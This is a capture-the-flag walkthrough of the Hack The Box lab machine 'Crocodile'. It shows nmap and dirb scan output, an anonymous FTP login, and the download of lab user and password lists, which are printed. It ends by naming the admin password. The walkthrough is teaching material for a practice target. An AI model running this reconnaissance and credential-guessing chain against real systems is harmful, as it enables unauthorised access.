Crocodile
Port recognition withnmapor you can use recon
┌──(root@ghost)-[/home/ghost]
└─# recon crocodile.htb
.o oOOOOOOOo OOOo
Ob.OOOOOOOo OOOo. oOOo. .adOOOOOOO
OboO"""""""""""".OOo. .oOOOOOo. OOOo.oOOOOOo.."""""""""'OO
OOP.oOOOOOOOOOOO "POOOOOOOOOOOo. `"OOOOOOOOOP,OOOOOOOOOOOB'
`O'OOOO' `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO' `OOOOo
.OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO
OOOOO '"OOOOOOOOOOOOOOOO"` oOO
oOOOOOba. .adOOOOOOOOOOba .adOOOOo.
oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO
OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"` '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
"OOOO" "YOoOOOOMOIONODOO"` . '"OOROAOPOEOOOoOY" "OOO"
Y 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :`
: .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? .
. oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
'%o OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
`$" `OOOO' `O"Y ' `OOOO' o .
. . OP" : o .
:
.
[R3C0N] by 0bfxgh0st 4 WWA with ❤
Hey I was thinking about this part of the code...oh wait, pull request is already done RiJaba1
[OS] Linux (99%)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-21 12:59 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 12:59
Completed NSE at 12:59, 0.00s elapsed
Initiating Ping Scan at 12:59
Scanning crocodile.htb (10.129.130.26) [4 ports]
Completed Ping Scan at 12:59, 0.07s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 12:59
Scanning crocodile.htb (10.129.130.26) [65535 ports]
Discovered open port 80/tcp on 10.129.130.26
Discovered open port 21/tcp on 10.129.130.26
Completed SYN Stealth Scan at 13:00, 14.30s elapsed (65535 total ports)
NSE: Script scanning 10.129.130.26.
Initiating NSE at 13:00
Completed NSE at 13:00, 0.40s elapsed
Nmap scan report for crocodile.htb (10.129.130.26)
Host is up (0.063s latency).
Not shown: 64919 closed tcp ports (reset), 614 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
21/tcp open ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 33 Jun 08 2021 allowed.userlist
|_-rw-r--r-- 1 ftp ftp 62 Apr 20 2021 allowed.userlist.passwd
80/tcp open http
NSE: Script Post-scanning.
Initiating NSE at 13:00
Completed NSE at 13:00, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 14.93 seconds
Raw packets sent: 70979 (3.123MB) | Rcvd: 66418 (2.657MB)
┌─[+] [ftp]
└─(Credentials for ftp crocodile.htb:21)
[user:ftp][password:]
[user:anonymous][password:]
[+] [fuzzin server]
http://crocodile.htb [200 OK] Apache[2.4.41], Bootstrap, Country[RESERVED][ZZ], Email[hello@ayroui.com,support@uideck.com], Frame, HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.129.130.26], JQuery[1.12.4], Modernizr[3.7.1.min], Script, Title[Smash - Bootstrap Business Template]
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Jul 21 13:00:13 2022
URL_BASE: http://crocodile.htb:80/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://crocodile.htb:80/ ----
==> DIRECTORY: http://crocodile.htb:80/assets/
==> DIRECTORY: http://crocodile.htb:80/css/
==> DIRECTORY: http://crocodile.htb:80/dashboard/
==> DIRECTORY: http://crocodile.htb:80/fonts/
+ http://crocodile.htb:80/index.html (CODE:200|SIZE:58565)
==> DIRECTORY: http://crocodile.htb:80/js/
+ http://crocodile.htb:80/server-status (CODE:403|SIZE:278)
-----------------
END_TIME: Thu Jul 21 13:05:28 2022
DOWNLOADED: 4612 - FOUND: 2
recon reports two open tcp ports 21 for ftp and 80 for web service, additionally show us we can log into ftp service as user ftp or anonymous with blank password
┌──(root@ghost)-[/home/ghost]
└─# ftp crocodile.htb
Connected to crocodile.htb.
220 (vsFTPd 3.0.3)
Name (crocodile.htb:ghost): ftp
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||43988|)
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 33 Jun 08 2021 allowed.userlist
-rw-r--r-- 1 ftp ftp 62 Apr 20 2021 allowed.userlist.passwd
226 Directory send OK.
ftp> get allowed.userlist
local: allowed.userlist remote: allowed.userlist
229 Entering Extended Passive Mode (|||48777|)
150 Opening BINARY mode data connection for allowed.userlist (33 bytes).
100% |******************************************************************************************************************************************************| 33 9.92 KiB/s 00:00 ETA
226 Transfer complete.
33 bytes received in 00:00 (0.50 KiB/s)
ftp> get allowed.userlist.passwd
local: allowed.userlist.passwd remote: allowed.userlist.passwd
229 Entering Extended Passive Mode (|||48372|)
150 Opening BINARY mode data connection for allowed.userlist.passwd (62 bytes).
100% |******************************************************************************************************************************************************| 62 33.90 KiB/s 00:00 ETA
226 Transfer complete.
62 bytes received in 00:00 (0.94 KiB/s)
ftp> exit
221 Goodbye.
┌──(root@ghost)-[/home/ghost]
└─# cat allowed.userlist
aron
pwnmeow
egotisticalsw
admin
┌──(root@ghost)-[/home/ghost]
└─# cat allowed.userlist.passwd
root
Supersecretpassword1
@BaASD&9032123sADS
rKXM59ESxesUFHAd
We obtained users and passwords lists, after checking combinations we can log as admin with password rKXM59ESxesUFHAd
